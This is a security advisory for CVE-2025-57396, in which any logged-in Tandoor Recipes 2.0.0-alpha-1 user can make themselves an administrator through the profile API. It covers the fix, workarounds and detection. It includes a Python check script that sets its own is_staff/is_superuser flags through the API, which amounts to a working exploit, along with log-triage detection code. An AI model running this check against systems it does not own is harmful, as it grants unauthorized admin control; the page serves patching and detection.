CVE-2025-57396
📋 TL;DR
CVE-2025-57396 is a privilege escalation vulnerability in Tandoor Recipes: any authenticated user can modify their own profile through the User Profile API endpoint and set the privilege flags on it, becoming an administrator. The affected release is Tandoor Recipes 2.0.0-alpha-1; the cause is an improper access control in that endpoint (the server does not restrict which profile fields an ordinary user may write), fixed in 2.0.0-alpha-2.
💻 Affected Systems
- Tandoor Recipes
📦 What is this software?
Tandoor Recipes ("Recipes by Tandoor") is an open-source, self-hosted recipe manager and meal planner. It is a Django application whose web frontend and integrations talk to the backend through a REST API, which is where this vulnerability lives.
⚠️ Risk & Real-World Impact
Worst Case
Any authenticated user makes themselves a full administrator and takes complete control of the Tandoor Recipes instance: managing every account, reading and altering all stored data, and, depending on how the instance is deployed, using the administrative interface as a foothold for further access.
Likely Case
A malicious user, or an attacker holding a compromised low-privilege account, escalates to administrator to read other users' data, change permissions, lock out legitimate users, or disrupt the service.
If Mitigated
With the instance reachable only by trusted users, segmented from other systems, and privilege changes monitored, the impact is confined to the Tandoor Recipes application and an escalation is detected quickly; only the patch removes the flaw itself.
🎯 Exploit Status
Exploitation requires an authenticated account (any low-privilege user suffices) but is otherwise straightforward: a single API write to the user's own profile that sets the privilege boolean flags to true.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.0.0-alpha-2
Vendor Advisory: https://m10x.de/posts/2025/08/continuous-checks-are-important-privilege-escalation-in-tandoor-recipes/
Restart Required: Only the restart that applying the update already implies (pulling a new container image or restarting the service); no separate reboot.
Instructions:
1. Back up the Tandoor Recipes database and media directory.
2. Update to version 2.0.0-alpha-2 or later using your usual upgrade procedure (new image or release, then the upgrade steps your deployment normally runs).
3. Confirm the running version is 2.0.0-alpha-2 or later.
4. Audit existing accounts for unexpected staff/superuser flags: the update does not undo escalations that already happened. Keep monitoring for privilege changes afterwards.
🔧 Temporary Workarounds
Restrict the User Profile API
Until patched, block or restrict write access (PUT/PATCH) to the vulnerable User Profile API endpoint, for example at the reverse proxy, accepting that users cannot edit their own profile in the meantime.
Network Access Control
Restrict network access to Tandoor Recipes to trusted users only. This narrows who can attempt the attack but does not remove the flaw: any account that can log in can still exploit it.
🧯 If You Can't Patch
- Keep the set of accounts minimal, review existing accounts for unexpected staff/superuser flags, and monitor for privilege escalation attempts
- Isolate the Tandoor Recipes instance from other critical systems so an administrator of the application gains nothing beyond it
🔍 How to Verify
Check if Vulnerable:
Check whether the instance runs Tandoor Recipes 2.0.0-alpha-1. To confirm the flaw directly, use a dedicated low-privilege test account (never a real user's) and attempt to set the staff/superuser flags on its own profile through the API; if reading the profile back shows the flags set, the instance is vulnerable. Reset the flags afterwards.
Check Version:
Read the version from the Tandoor Recipes web interface, or from the deployed image tag or release files of your installation.
Verify Fix Applied:
After updating, confirm the version is 2.0.0-alpha-2 or later and repeat the test above: a profile write from a low-privilege account must no longer change its privilege flags.
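The check described in this section, written out as an added example (not Tandoor's code and not the advisory author's proof of concept). It reads the test account's own profile, attempts the privilege write, reads the profile back, and reverts whatever it managed to change. Assumptions not confirmed by this page: the endpoint path /api/user/profile/ is taken from the page as written, the endpoint accepts a JSON PATCH, the API takes a token in an "Authorization: Bearer" header, and the flags are Django's is_staff / is_superuser. The FakeProfileServer class is a constructed stand-in so the logic can be exercised offline against a simulated vulnerable and fixed build.

```python
"""Active check for the profile privilege-escalation described above.

Added example, not Tandoor's code. The endpoint path, the Bearer header and
the flag names are assumptions (see lead-in). Run only against an instance
you own, with a throwaway low-privilege account.
"""
import json
import urllib.error
import urllib.request

PROFILE_PATH = "/api/user/profile/"        # path as given on this page (assumed)
PRIV_FLAGS = ("is_staff", "is_superuser")  # Django's built-in privilege flags


def urllib_transport(method, url, headers, body):
    """Real HTTP transport on the standard library: returns (status, json)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            raw = resp.read()
            return resp.status, (json.loads(raw) if raw else {})
    except urllib.error.HTTPError as err:
        return err.code, {}


def check_escalation(base_url, token, transport=urllib_transport):
    """Try to raise the calling account's own privilege flags and report.

    Reads the profile, PATCHes the flags to true, reads it back, then reverts
    whatever changed. A fixed build ignores or rejects the write, so the
    read-back still shows the original values.
    """
    url = base_url.rstrip("/") + PROFILE_PATH
    headers = {
        "Authorization": f"Bearer {token}",  # header scheme is an assumption
        "Content-Type": "application/json",
        "Accept": "application/json",
    }
    status, before = transport("GET", url, headers, None)
    if status != 200:
        return {"vulnerable": None, "reason": f"GET returned {status}"}
    if any(before.get(f) is True for f in PRIV_FLAGS):
        return {"vulnerable": None, "reason": "test account is already privileged"}

    patch_status, _ = transport("PATCH", url, headers, {f: True for f in PRIV_FLAGS})
    _, after = transport("GET", url, headers, None)
    escalated = [f for f in PRIV_FLAGS if after.get(f) is True]

    if escalated:  # best-effort cleanup of the flags we managed to set
        transport("PATCH", url, headers, {f: False for f in escalated})

    return {"vulnerable": bool(escalated), "escalated_flags": escalated,
            "patch_status": patch_status}


class FakeProfileServer:
    """Constructed stand-in for the endpoint so the check runs offline.

    writable_flags lists the privilege fields the server accepts from the
    client: all of them models the vulnerable build, none models the fix.
    """

    def __init__(self, writable_flags):
        self.profile = {"username": "tester", "is_staff": False, "is_superuser": False}
        self.writable = set(writable_flags)

    def __call__(self, method, url, headers, body):
        if method == "GET":
            return 200, dict(self.profile)
        if method == "PATCH":
            for key, value in (body or {}).items():
                if key in self.writable:  # a fixed serializer drops the rest
                    self.profile[key] = value
            return 200, dict(self.profile)
        return 405, {}


if __name__ == "__main__":
    import sys

    if len(sys.argv) == 3:  # python check.py https://recipes.example <api-token>
        print(check_escalation(sys.argv[1], sys.argv[2]))
    else:
        print("vulnerable build:", check_escalation("https://x", "t", FakeProfileServer(PRIV_FLAGS)))
        print("fixed build:     ", check_escalation("https://x", "t", FakeProfileServer(())))
```

If the PATCH is accepted but the read-back is unchanged, the server dropped the fields server-side, which is the fixed behaviour; a 403 on the PATCH also counts as fixed. A result with "vulnerable": None means the check could not be run (wrong token, wrong path, or a test account that was already privileged) and should not be read as "not vulnerable".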
📡 Detection & Monitoring
Log Indicators:
- Unexpected changes to a user's privilege flags
- Write calls to the user profile endpoint that carry privilege fields
- Accounts that hold staff or superuser rights without a corresponding administrator action
Network Indicators:
- PUT or PATCH requests to the user profile endpoint (given here as /api/user/profile/) whose body sets is_staff or is_superuser (Django's built-in privilege flags). Reverse-proxy access logs record method and path but not the request body, so the write itself is the trigger; confirm the outcome by checking the account's flags afterwards.
SIEM Query:
source="tandoor" AND (event="user_privilege_change" OR (api_endpoint="/api/user/profile/" AND (method="PUT" OR method="PATCH")))
(field names are placeholders; map them to the fields your log source actually emits)
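The two detection signals above, implemented as an added example (not from the page or from Tandoor): triage of reverse-proxy access logs for writes to the profile endpoint, corroborated by the same client reaching /admin/ shortly afterwards, and a diff of periodic privilege-flag snapshots that catches the outcome even when the request was never logged. The nginx "combined" log format, the endpoint path taken from this page, and the snapshot shape are assumptions; the log lines and snapshots are constructed, not real data.

```python
"""Detection for the indicators listed above: an added example, not from the
page or from Tandoor. Log format, endpoint path and snapshot shape are
assumptions; all sample data below is constructed.
"""
import re
from datetime import datetime

PROFILE_PATH = "/api/user/profile/"        # path as given on this page (assumed)
PRIV_FLAGS = ("is_staff", "is_superuser")  # Django's built-in privilege flags
WRITE_METHODS = {"PUT", "PATCH"}
ADMIN_WINDOW_SECONDS = 60                  # corroboration window after a write

# nginx "combined" format: ip - user [time] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Aug/2025:10:01:02 +0000] "GET /api/recipe/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Aug/2025:10:01:09 +0000] "PATCH /api/user/profile/ HTTP/1.1" 200 312 "-" "python-requests/2.32"
203.0.113.7 - - [20/Aug/2025:10:01:15 +0000] "GET /admin/ HTTP/1.1" 200 8801 "-" "python-requests/2.32"
198.51.100.4 - - [20/Aug/2025:10:02:00 +0000] "PUT /api/user/profile/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [20/Aug/2025:10:02:30 +0000] "GET /api/user/profile/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""


def parse_log(lines):
    """Parse combined-format lines; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["time"], "%d/%b/%Y:%H:%M:%S %z")
        e["path"] = e["path"].split("?", 1)[0]  # drop any query string
        events.append(e)
    return events


def triage_access_log(lines):
    """Return each profile write, noting whether the same client hit /admin/
    within ADMIN_WINDOW_SECONDS afterwards. The body is not in the log, so
    the write itself is the trigger to investigate."""
    events = parse_log(lines)
    hits = []
    for e in events:
        if e["method"] not in WRITE_METHODS or e["path"] != PROFILE_PATH:
            continue
        admin_after = any(
            o["ip"] == e["ip"] and o["path"].startswith("/admin")
            and 0 <= (o["ts"] - e["ts"]).total_seconds() <= ADMIN_WINDOW_SECONDS
            for o in events)
        hits.append({"ip": e["ip"], "time": e["time"], "method": e["method"],
                     "status": int(e["status"]), "admin_access_after": admin_after})
    return hits


def diff_privileges(before, after):
    """before/after map username -> {"is_staff": bool, "is_superuser": bool}.
    Returns accounts that gained a flag between the two snapshots, including
    accounts that are new and already privileged; each needs a human to
    confirm the change was sanctioned."""
    findings = []
    for user, flags in after.items():
        old = before.get(user, {})
        gained = [f for f in PRIV_FLAGS if flags.get(f) and not old.get(f)]
        if gained:
            findings.append({"user": user, "gained": gained,
                             "new_account": user not in before})
    return findings


# Constructed snapshots, e.g. reduced from a periodic `manage.py dumpdata auth.User`.
SNAPSHOT_BEFORE = {"admin": {"is_staff": True, "is_superuser": True},
                   "alice": {"is_staff": False, "is_superuser": False},
                   "bob": {"is_staff": False, "is_superuser": False}}
SNAPSHOT_AFTER = {"admin": {"is_staff": True, "is_superuser": True},
                  "alice": {"is_staff": True, "is_superuser": True},
                  "bob": {"is_staff": False, "is_superuser": False}}

if __name__ == "__main__":
    for hit in triage_access_log(SAMPLE_LOG.splitlines()):
        print("profile write:", hit)
    for finding in diff_privileges(SNAPSHOT_BEFORE, SNAPSHOT_AFTER):
        print("privilege gained:", finding)
```

On the sample data the first write is followed by an /admin/ request from the same address within six seconds, which is what a successful escalation looks like from the proxy; the second write has no such follow-up and may be a legitimate profile edit. The snapshot diff is the authoritative signal: it reports alice gaining both flags regardless of how the request was logged, and it should be run on a schedule rather than only after an alert.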